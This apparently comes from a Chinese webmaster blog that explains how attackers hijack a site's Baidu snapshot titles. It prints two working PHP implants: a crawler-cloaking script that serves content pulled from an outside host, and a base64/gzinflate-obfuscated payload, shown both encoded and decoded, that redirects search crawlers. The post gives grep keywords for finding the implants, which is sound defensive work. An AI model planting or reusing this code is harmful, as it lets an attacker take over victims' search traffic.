篡改百度快照网页标题的解决方法

admin

最近客户网站虽然百度收录了三四万 但发现好多快照标题不是自己网站的标题，麻烦啊 经过仔细查找 重要找到了解决办法。
所谓的黑客利用漏洞 或者文件上传可以修改程序文件或者上传程序文件，这个文件是干啥的呢？就是用来区分是蜘蛛还是平常访问，如果是蜘蛛爬行的话 他就引导蜘蛛抓他网站的页面，导致快照标题是黑客搞的 点进去却是自己网站的标题。

     类似这样的篡改网页标题的方法 现在发现有俩种

1、这些人会上传一个文件 文件是：

1. <?php
   
2. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
   
3. ini_set('display_errors',0);
   
4. 
   
5. $spider_arr = array(
   
6.         'baiduspider',
   
7.         'baiduspider/2.0',
   
8.         'baiducustomer',
   
9.         'baidu-thumbnail',
   
10.         'baiduspider-mobile-gate',
    
11.         'baiduspider-mobile-gate',
    
12.         'baidu-transcoder/1.0.6.0',
    
13. 
    
14.         'googlebot/2.1',
    
15.         'googlebot-image/1.0',
    
16.         'feedfetcher-google',
    
17.         'mediapartners-google',
    
18.         'adsbot-google',
    
19.         'googlebot-mobile/2.1',
    
20.         'googlefriendconnect/1.0',
    
21. 
    
22.         'sosospider',
    
23.         'sosoblogspider',
    
24.         'sosoimagespider',
    
25. 
    
26.         'sogou web robot',
    
27.         'sogou web spider/3.0',
    
28.         'sogou web spider/4.0',
    
29.         'sogou head spider/3.0',
    
30.         'sogou-test-spider/4.0',
    
31.         'sogou orion spider/4.0',
    
32. );
    
33. 
    
34. $not_spider_ip_arr = array(
    
35.         "222.77.187.33",
    
36.         "125.90.88.96"
    
37. );
    
38. 
    
39. $ref_arr = array(
    
40.     'baidu.com',
    
41.     'google.com'
    
42. );
    
43. 
    
44. $agent = $_SERVER['HTTP_USER_AGENT'];
    
45. $rip = $_SERVER["REMOTE_ADDR"];
    
46. $referer = $_SERVER["HTTP_REFERER"];
    
47. 
    
48. $spider = false;
    
49. foreach($spider_arr as $_spider) {
    
50.         if(stripos($agent,$_spider) !== false) {
    
51.                 $spider = true;
    
52.                 break;
    
53.         }
    
54. }
    
55. 
    
56. if(in_array($rip,$not_spider_ip_arr)) {
    
57.         $spider = false;
    
58. }
    
59. 
    
60. $ref = false;
    
61. foreach($ref_arr as $_ref) {
    
62.         if(stripos($referer,$_ref) !== false) {
    
63.                 $ref = true;
    
64.                 break;
    
65.         }
    
66. }
    
67. 
    
68. 
    
69. if(array_key_exists('bd',$_GET)&&$ref) {
    
70.         $xt = trim($_GET['bd']);
    
71.         Header("Location: ".'http://www.baidu.com?'.$_SERVER['SERVER_NAME']);
    
72.         exit;
    
73. }
    
74. 
    
75. if($spider) {
    
76.         echo file_get_contents('http://www.xxx.cn/web/bbs/xin.asp');
    
77. }
    
78. ?>

复制代码

所以有遇到这样情况的站站 请根据这个程序的关键字进行批量查找网站，比如 批量查找 echo file_get_contents( 这样的关键词语。如果您懂程序 就会发现 此程序的原理就是我刚说的 。

2、这些人 会 在网站上挂上

1. eval(gzinflate(base64_decode('hVZ7b9owEP8fie/gWlGbrBASWFlbRqtuZRpTH4hV2ySGIje4xWpeckxY1fHdd3YeBGg6FMnx3e/ufvewSb1Wr1HOQ+5wGoVcsOBRt4xeveZ6JI4R8bxw6bAIvdRrqF5LCEdaIesjwjl51rHd7ph2+8j8YJt2s31k4QZuWx2zbR2bXcu0u1Ym7HbN9vsTs3sMKpC1FbANiGMwBLBtK6EMD8EeFoErWBggx3HDIBZ84QrdACKrbfWM7mgjzhIiKCpQPnmiI04fhyNdA7RRr8mUEHtAOmzhUeIGbmLDUNnCTyPDEWRJ/0ReOKM6NnFD2fZS9UPIKXHnSFc4EiPtqX+mJYV56n0vd59sOlcBImDkeMxnApl9pIk5i5tnZapJHmwLClx6uZ8Vol5My24Ji24Wfpl6E6gnJeK6xvoZbGJNexr7WGxtuT08NAqHKjQEVes5/otNjZ3iiVx666CrqrQgeR6FsV6SNmQpbaPfl7X3aFDWGU3bOFd7E0/xKSDNYrdOOX1RS5p+0bNSbKgo+FdG6VQgxKlY8KCM6lWOzCMVF573yQvdJ2hFXg/Z06xR+UnY7CmDuHapMOsx2bR6dWJyHxGZzTiN0RtDsWMCYEjXYXCSPeKm84p/y6HN3Rm9KqPC5h3YTKzmyfTFbnRWyvYVq4IdbskxiExYd1FQ4FhMpjKJ3GQHdHi4O0PZkvcqc7Ru1OLeY+66T+6cph2SZQS0IPceXVduq43gRhvG30IW0BmAHggMj5JFGyaO6zEaCOhTZiLVgjNfh1cpUXOQBVORsz4XQtXfhHiLVC3xaup8IgCFX1KdLDE4TEdgTsmMch1/vbsbteBORB3LRtdhAkxHlPskAEbes7ogc+hV6BJZhVM0FyI6bbWWy6VJ3XgeRoL60FRBTTf0lY0qYPrUa1l14eKkbx6BciGyNEBKgySl6Xy+Gg5u7pzhCBtof18Ok0ti6vpRJayB8CJ4CsJlANeh6hiUtgoM3NTx3on7y/lyO/55Mb4cXMq3t6PvgP/PYcfkNSbjwfXt3cC5uLysJrCBeTPuBrIcjsUxFbrmfB+MfwzGk4MS8GCq4lbotihVoF4lVYHNaOWowrCXT5Se3RirfKi0UJ299IshoMvio0JPj5GO9taQ5tn6NBvw96Xu538=')));

复制代码

这样的东东，其实懂程序的人也知道 他只是障眼法，这个是通过encoded_data 这个函数把php程序进行压缩，我们发现通过 base64_decode解码出来后 是：

1. <?php
   
2. 
   
3. 
   
4. error_reporting(0);
   
5. class allow_ip {
   
6. 
   
7. var $allow_ip = array("123.125.71.1-250","203.208.60.160-250","66.249.68.200-220","220.181.108.11-220");
   
8. 
   
9. function __construct(){
   
10. }
    
11. 
    
12. function __destruct(){
    
13. }
    
14. 
    
15. private function makePregIP($str)
    
16. {
    
17.   if (strstr($str,"-")) {
    
18.     $aIP = explode(".",$str);
    
19.     foreach ($aIP as $k=>$v) {
    
20.       if (!strstr($v,"-")) {
    
21.         $preg_limit .= $this->makePregIP($v);
    
22.     $preg_limit .= ".";
    
23.       } else{
    
24.         $aipNum = explode("-",$v);
    
25.     for($i=$aipNum[0];$i<=$aipNum[1];$i++){
    
26.       $preg .=$preg?"|".$i:"[".$i;
    
27.         }
    
28.         $preg_limit .=strrpos($preg_limit,".",1)==(strlen($preg_limit)-1)?$preg."]":".".$preg."]";
    
29.       }
    
30.     }
    
31.   } else {
    
32.     $preg_limit = $str;
    
33.   }
    
34. 
    
35.   return $preg_limit;
    
36. }
    
37. 
    
38. private function getAllBlockIP(){
    
39.     if ($this->allow_ip) {
    
40.         $i = 1;
    
41.         foreach ($this->allow_ip as $k=>$v) {
    
42.             $ipaddres = $this->makePregIP($v);
    
43. 
    
44.             $ip = str_ireplace(".","\.",$ipaddres);
    
45.             $ip = str_replace("*","[0-9]{1,3}",$ip);
    
46.             $ipaddres = "/".$ip."/";
    
47.             $ip_list[] = $ipaddres;
    
48.             $i++;
    
49.         }
    
50.     }
    
51.     return $ip_list;
    
52. }
    
53. 
    
54. public function checkIP() {
    
55. $iptable = $this->getAllBlockIP();
    
56. $IsJoined = false;
    
57. $Ip = $this->get_client_ip();
    
58. $Ip = trim($Ip);
    
59. if ($iptable) {
    
60. foreach($iptable as $value) {
    
61. if (preg_match("{$value}",$Ip)) {
    
62. header("HTTP/1.1 301 Moved Permanently");
    
63. header("Location: http://www.xxxx.com");
    
64. 
    
65. }
    
66. }
    
67. }
    
68. 
    
69. return true;
    
70. }
    
71. 
    
72. private function get_client_ip(){
    
73. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
    
74. $ip = getenv("HTTP_CLIENT_IP");
    
75. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
    
76. $ip = getenv("HTTP_X_FORWARDED_FOR");
    
77. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
    
78. $ip = getenv("REMOTE_ADDR");
    
79. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
    
80. $ip = $_SERVER['REMOTE_ADDR'];
    
81. else
    
82. $ip = "unknown";
    
83. return($ip);
    
84. }
    
85. }
    
86. 
    
87. $oBlock_ip = new allow_ip();
    
88. if( !$oBlock_ip->checkIP() ) exit;
    
89. 
    
90. 
    
91. ?>

复制代码

那么第二种方式 站长可以用 eval(gzinflate(base64_decode 关键字进行批量查找程序  看是否有。

以上就是目前发现的2种挂马 篡改快照的方法。